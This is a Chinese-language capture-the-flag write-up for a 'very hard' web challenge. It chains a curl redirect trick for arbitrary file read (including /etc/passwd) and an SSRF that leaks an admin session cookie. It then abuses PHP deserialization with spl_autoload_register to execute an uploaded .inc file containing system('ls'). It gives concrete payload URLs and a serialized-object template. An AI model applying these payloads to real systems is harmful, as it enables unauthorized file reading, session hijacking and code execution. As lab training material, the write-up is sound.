### 1.题目名称

Battlefront



### 2.题目类型

web(very hard)



### 3.题目描述

请帮助skywalker入侵deathstar！



### 4.考察知识点

任意文件读取/下载，SSRF ，PHP 反序列化，spl_autoload_register设计缺陷



### 5.解题思路

1.curl library 任意文件读取：***

在题目中有一处可以提交url，尝试后发现url结尾必须是jpg或者png，而且必须以http://的形式开头。所以这样子不能直接读源码文件。继续尝试后发现此处支持302跳转，所以可以利用redirect.php的302跳转来实现绕过过滤。

构造如下url即可读取/etc/passwd:

> http://127.0.0.1/redirect.php?redirect=file:///etc/passwd&a=1.jpg

读取的结果如下所示：

 ![QQ截图20170615135222](jpg\QQ截图20170615135222.png)



同理，我们可以读到所有的源码。

***2. SSRF***

在审计login.php时，我们发现这样的代码块：

 ![QQ截图20170615135428](jpg\QQ截图20170615135428.png)

也就是说，如果我们用之前的curl尝试去访问这个页面的话，我们当前的session会被设置成管理员的session。但是需要注意的是curl的函数是不支持我们转发cookie的，因此我们没有办法设置将我们现在的session设置成管理员的session的。但是我们又在curl函数中发现遗留下的debug的代码，只要传递$debug=1即可运行到下面的分支：

 ![QQ截图20170615135850](jpg\QQ截图20170615135850.png)

因为如果不是用cookie访问login.php页面时，我们会在http返回头部中获取到对应于管理员session的cookie。然后将我们当前的cookie设置成这个值即可获取管理员权限。

我们构造的url如下所示：

> http://127.0.0.1/index.php?act=login&debug=1&username=haozi&password=hao&a=1.jpg

但是，需要注意的是如果直接提交这个url的话，会因为存在302跳转，最后得到的页面是index.所以我们必须用redirect.php使得最终的302跳转的次数超出限制，不再跳转为止，于是构造如下url:

> http://127.0.0.1/redirect.php?redirect=http://127.0.0.1/index.php?act=login&debug=1&username=haozi&password=haozi&a=1.jpg

又因为如果不进行编码的话，此处所有的参数将全部传递给redirect.php而不是最终的login.php，所以我们最终构造的url如下：

> http://127.0.0.1/redirect.php?redirect=http://127.0.0.1/index.php?act=login%26debug=1%26username=haozi%26password=haozi%26a=1.jpg

此外，注意*<u>POST的$debug的值改成1</u>*。

最后我们可以从图片中得到我们想要的cookie：

 ![QQ截图20170615152626](jpg\QQ截图20170615152626.png)



***3. PHP反序列化 & spl_autoload_register***

我们可以在common.php中找到一处很明显的PHP反序列化的漏洞，但是本题并没有提供可以用于构造的对象，也就没有办法利用反序列化的漏洞进行对象注入：

 ![QQ截图20170615155014](jpg\QQ截图20170615155014.png)

但是同样我们可以再代码中发现没有带任何参数的spl_autoload_register函数，利用这个函数我们可以再未事先引用相关的类库文件的时候直接去使用相关的类，而这个函数将会在系统的include文件夹中为我们找打相应的类库文件并加载。而这个函数会默认加载的两种文件类型是.inc 以及.php，也就是说，虽然.php 在upload中被过滤，但我们仍然可以使用上传的.inc文件进行任意代码执行。

我们先上传我们的类文件，此处，简单的写一个echo证明存在任意代码执行：

```php
<?php
system('ls');
```

需要注意的是上传时要<u>*修改文件的内容类型*</u>为：

> image/jpeg

接下来我们构造一个触发反序列化的序列化字符串，其中类名需要和

> O:32:"xxxxxxxx":0:{}

将这个字符串作为piclist的cookie提交(xxxx是上传后的文件名）。并添加include path为/var/www/html/upload:

![屏幕快照 2018-09-24 下午5.06.03](/Users/haozigege/Desktop/work/icq/icq_30/web_very_hard_2/writeup/jpg/屏幕快照 2018-09-24 下午5.06.03.png)

最后的运行结果如下图所示：

![屏幕快照 2018-09-24 下午5.07.54](/Users/haozigege/Desktop/work/icq/icq_30/web_very_hard_2/writeup/jpg/屏幕快照 2018-09-24 下午5.07.54.png)













